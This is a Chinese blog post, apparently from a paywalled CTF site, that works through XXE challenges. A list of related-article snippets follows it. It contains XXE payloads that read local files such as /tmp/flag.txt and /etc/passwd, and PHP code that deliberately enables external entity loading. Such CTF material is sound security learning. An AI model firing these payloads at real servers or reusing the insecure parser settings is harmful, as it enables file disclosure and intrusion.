CTF吧-渗透测试靶场-XXE篇

原创

已于 2024-11-07 08:47:43 修改 · 253 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全

于 2024-11-06 20:29:20 首次发布

第一题

<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY xxe SYSTEM "file:///tmp/flag.txt">
]>
<demon>&xxe;</demon>

第二题

查看源码

<?php
header("content-type:text/html;charset=utf-8");
highlight_file(__FILE__);

libxml_disable_entity_loader(false);
//获取post请求的内容
$xmlfile = $_POST['xml'];
//创建一个节点，理论上默认代表跟节点
$dom = new DOMDocument();
// options 中配置代表允许加载外部实体
$dom->loadXML($xmlfile,LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
echo "<a href='http://www.hacker.wang/xxe/xxx.txt'>查看</a>";

?>

没有漏洞一中的输出 echo $xxe->login;也就是没有回显

快速判断是否存在XXE漏洞，可以使用dnslog.cn判断：

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note[

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Demon乀

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

CTF之XXE Lab 1靶机渗透（base加密）

afei001

07-11

692

练习环境攻击机：kali 靶机：XXE Lab: 1 下载地址：https://download.vulnhub.com/xxe/XXE.zip 1.发现靶机，端口扫描 root@kali:~# netdiscover -r 192.168.3.0/16 IP At MAC Address Count Len MAC Vendor / Hostname ------------------------.

Apache2 Ubuntu靶场练习——XXE漏洞渗透

qq_48368964的博客

07-25

678

Apache2 Ubuntu Default Page 是一个包含xxe漏洞的页面，如何找到和利用xxe漏洞，并找到flag呢？1.御剑端口扫描2.bp抓包查询可利用漏洞3.利用已知漏洞查看关键文件信息4.简单的代码审计获取flag。

参与评论您还未登录，请先登录后发表或查看评论

XXE漏洞(ctfshow-xxe)

unexpectedthing的博客

10-29

1232

文章目录XEE漏洞的原理ctfshow-xxeweb373web374，375，376web377web378 XEE漏洞的原理 XML外部实体注入 ctfshow-xxe web373 代码 <?php error_reporting(0); libxml_disable_entity_loader(false); //file_get_contents("php://input"),我们需要post我们的payload $xmlfile = file_get_contents('php://inp

CTFSHOW xxe篇

羽的博客

01-11

3523

web373 payload <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <yu22x> <ctfshow>&xxe;</ctfshow> </yu22x> web374、375、376 payload <!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64

CTF-XXE 漏洞解题思路总结

最新发布

qq_41846013的博客

08-05

832

XXE (XML External Entity) 漏洞允许攻击者通过构造恶意的 XML 输入，强迫服务器的 XML 解析器执行非预期的操作。在 CTF 场景中，最常见的利用方式是让解析器读取服务器上的敏感文件，并将其内容返回给攻击者。根据靶机是否在响应中直接返回注入内容，攻击方式可分为“有回显”和“无回显”两种。这是最直接的情况，服务器会将读取到的文件内容显示在返回页面上。通过定义一个外部实体来加载本地文件，并在 XML 的某个字段中引用该实体。Payload 模板:<?xml version="1.0"

pikachu之XXE漏洞

weixin_46062722的博客

02-25

760

漏洞介绍 XXE -“xml external entity injection” 既"xml外部实体注入漏洞"。概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。具体的关于xml实体的介绍,网络上有很多,自己动手先查一下。现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。以PHP为例,在PHP里

CTF之xxe

qq_37410729的博客

10-26

1944

xxe漏洞即我们可以进行外部实体注入，当允许引用外部实体时，通过构造恶意内容，可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。两个writeup 第一题： bp抓包然后就可以进行xml注入了这是两种xxe，我们先试第二种（因为源代码并没有标注flag在什么文件中）然后进内网然而并进不去，那就只能找存活主机了。直接暴力寻找第二题：按照上题的思路走但是并没有找到flag。。。。最后只能去文件里找了，但是题目没有标明具体flag在那个文件，只能试一下/flag文

CTF学习笔记之XXE

克格莫（有需要的私信）

07-08

1345

一直对XXE理解不是很深入，今天仔细研究一下XXE以及CTF里面的XXE题型 0x00 XML基本格式 XML 文档有自己的一个格式规范，这个格式规范是由 DTD控制的。文档类型定义（DTD）可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD 可被成行地声明于 XML 文档中，也可作为一个外部引用。带有 DTD 的 XML 文档实例： <?xml version="1.0"?> <!DOCTYPE note [ <!ELEMENT note (

XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】

07-30

在XXE靶场中，我们可以模拟实际场景进行练习，例如在vulnhub的XXE Lab:1靶场中，首先识别靶机IP，使用工具如nmap扫描开放端口，然后通过目录遍历（如`robots.txt`）和Burp Suite抓包分析，确定XML数据传输。...

XXE漏洞学习之CTF

qq_46085232的博客

04-09

793

两道有关XXE的CTF题目盲猜过程总结Vulnhub练习题过程总结盲猜题目地址：http://web.jarvisoj.com:9882/ 过程访问题目地址提交数据，进行抓包看到数据提交这里，以为是基于json格式的sql注入，结果不是的，看页面源代码也看不出啥的，只怪自己的太菜。后来，才知道这里靠xxe漏洞，盲猜服务端能接受xml格式数据，修改Content-tpye值，并提交xml格式的playload。修改数据包，进行提交，获取flag（这里我通过读取etc/passwd知道有hom

ctfshow web入门 XXE

2301_79442654的博客

03-30

1337

XXE（XML External Entity）攻击是一种针对XML处理漏洞的网络安全攻击手段。攻击者利用应用程序在解析XML输入时的漏洞，构造恶意的XML数据，进而实现各种恶意目的。所以要学习xxe就需要了解xml。

XXE漏洞攻击——几道CTF题

热门推荐

qq_45521281的博客

05-14

1万+

文章目录Fake XML CookbookTrue XML Cookbook（XXE+ssrf）ISCC 未知的风险-1 Fake XML Cookbook sql注入不行，F12 查看源码： function doLogin(){ var username = $("#username").val(); // val() 方法返回或设置被选元素的值 var password = $("#password").val(); // $() 相当于 document.getElementById(

CTF-XXE(持续更新，欢迎分享更多相关知识点的题目)

m0_74317362的博客

08-28

1478

进来看到然后一起看。

CTF XXE漏洞攻击

夏日の blog

05-07

4037

文章目录Fake XML CookbookTrue XML CookbookISCC 未知的风险-1参考 Fake XML Cookbook F12 查看源码： function doLogin(){ var username = $("#username").val(); var password = $("#password").val(); if(username == "" || ...

XML外部实体注入漏洞——XXE简单分析

未完成的歌~的博客

02-01

3331

前言：前几天做了南邮 NJUPT CTF的几道题，感觉自己要学的的东西还有太多！今天借着比赛中的一道Web题来系统的学习下XML外部实体注入(XML External Entity Injection) 题目：Fake XML cookbook 题目：Fake XML cookbook 平台暂时还未关闭，想要复现的抓紧了！网址：https://nctf.x1c.club/challenges#Web ...

CTFSHOW—XXE

灰太的表格的博客

01-31

508

(睡了一下午打算，通宵学习hhhh) web373 wa1ki0g标签可以随便改，ctfshow这个不可以。 !DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <wa1ki0g> <ctfshow>&xxe;</ctfshow> </wa1ki0g>

CTF-[XXE学习记录]

qq_53142368的博客

06-07

1260

1.XXE 关于xml我就不详细说了，想看的话从我之前的文章找找，有关于xml的概念和怎么构造。 XML的设计宗旨是传输数据，而非显示数据。XML是不作为的，XML是不会做任何事情，XML 被设计用来结构化、存储以及传输信息。 XML是纯文本，且允许创作者定义自己的标签和文档结构，是独立于软件和硬件的信息传输工具。 0x01.DTD 文档类型定义（DTD）可定义合法的XML文档构建模块，DTD 可被成行地声明于 XML 文档中，也可作为一个外部引用。 1.内部的DOCTYPE声明假如DTD被包含在XML源

【web-ctf】ctf-pikachu-xxe

一个努力生活的人的博客

08-23

333

ctf-pikachu-xxe